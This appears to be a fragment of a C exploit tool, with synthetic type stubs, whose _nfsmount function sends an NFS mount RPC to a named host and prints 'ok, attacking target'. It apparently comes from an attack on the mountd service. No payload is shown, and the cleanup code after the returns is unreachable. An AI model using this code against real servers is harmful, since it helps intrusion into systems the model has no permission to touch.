
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_5__ TYPE_1__ ;


typedef int xdrproc_t ;
struct timeval {int tv_sec; scalar_t__ tv_usec; } ;
struct sockaddr_in {int sin_port; int sin_addr; int sin_family; } ;
struct hostent {char* h_name; int h_length; int h_addr; } ;
struct fhstatus {int dummy; } ;
typedef int caddr_t ;
struct TYPE_5__ {int cl_auth; } ;
typedef TYPE_1__ CLIENT ;


 int AF_INET ;
 int MOUNTPROC_MNT ;
 int MOUNTPROG ;
 int MOUNTVERS ;
 int NFS_PROGRAM ;
 int NFS_VERSION ;
 int RPC_ANYSOCK ;
 int RPC_SUCCESS ;
 int auth_destroy (int ) ;
 int authunix_create_default () ;
 int clnt_call (TYPE_1__*,int ,int ,int ,int ,int ,struct timeval) ;
 int clnt_destroy (TYPE_1__*) ;
 int clnt_pcreateerror (char*) ;
 TYPE_1__* clntudp_create (struct sockaddr_in*,int,int,struct timeval,int*) ;
 int close (int) ;
 int fprintf (int ,char*,...) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int memcpy (int *,int ,int ) ;
 int stderr ;
 scalar_t__ xdr_dirpath ;
 scalar_t__ xdr_fhstatus ;

int _nfsmount(char* hostname, char *dirname)
{
        CLIENT *mclient;
        int mountprog, mountvers;
        int nfsprog, nfsvers;
        int mountport = 0;
        int clnt_stat;
        int msock, fsock;

        struct hostent *hp;
        struct sockaddr_in server_addr;
        struct fhstatus status;
        struct timeval total_timeout, retry_timeout;



        if (!(hp = gethostbyname(hostname)))
        {
            fprintf(stderr, "mx: can't get address for %s\n", hostname);
            return(-1);
        }


        server_addr.sin_family = AF_INET;
        memcpy(&server_addr.sin_addr, hp->h_addr, hp->h_length);

        mountprog = MOUNTPROG;
        mountvers = MOUNTVERS;

        nfsprog = NFS_PROGRAM;
        nfsvers = NFS_VERSION;

        total_timeout.tv_usec = 0;
        total_timeout.tv_sec = 20;

        retry_timeout.tv_usec = 0;
        retry_timeout.tv_sec = 3;

        server_addr.sin_port = htons(mountport);
        msock = RPC_ANYSOCK;

        fprintf(stderr, "ok, attacking target %s\n", hp->h_name);

        mclient = clntudp_create(&server_addr,
            mountprog, mountvers,
            retry_timeout, &msock);

        if (mclient)
        {
            mclient->cl_auth = authunix_create_default();
            clnt_stat = clnt_call(mclient, MOUNTPROC_MNT,
                (xdrproc_t) xdr_dirpath, (caddr_t) &dirname,
                (xdrproc_t) xdr_fhstatus, (caddr_t) &status,
                total_timeout);

            if (clnt_stat != RPC_SUCCESS)
            {
                return(msock);
            }
            fprintf(stderr, "successful clnt_call\n");
            return(msock);
        }
        else
        {
            clnt_pcreateerror("mx clntudp_create");
            return(-1);
        }


        auth_destroy(mclient->cl_auth);
        clnt_destroy(mclient);
        close(msock);
        return (-1);
}
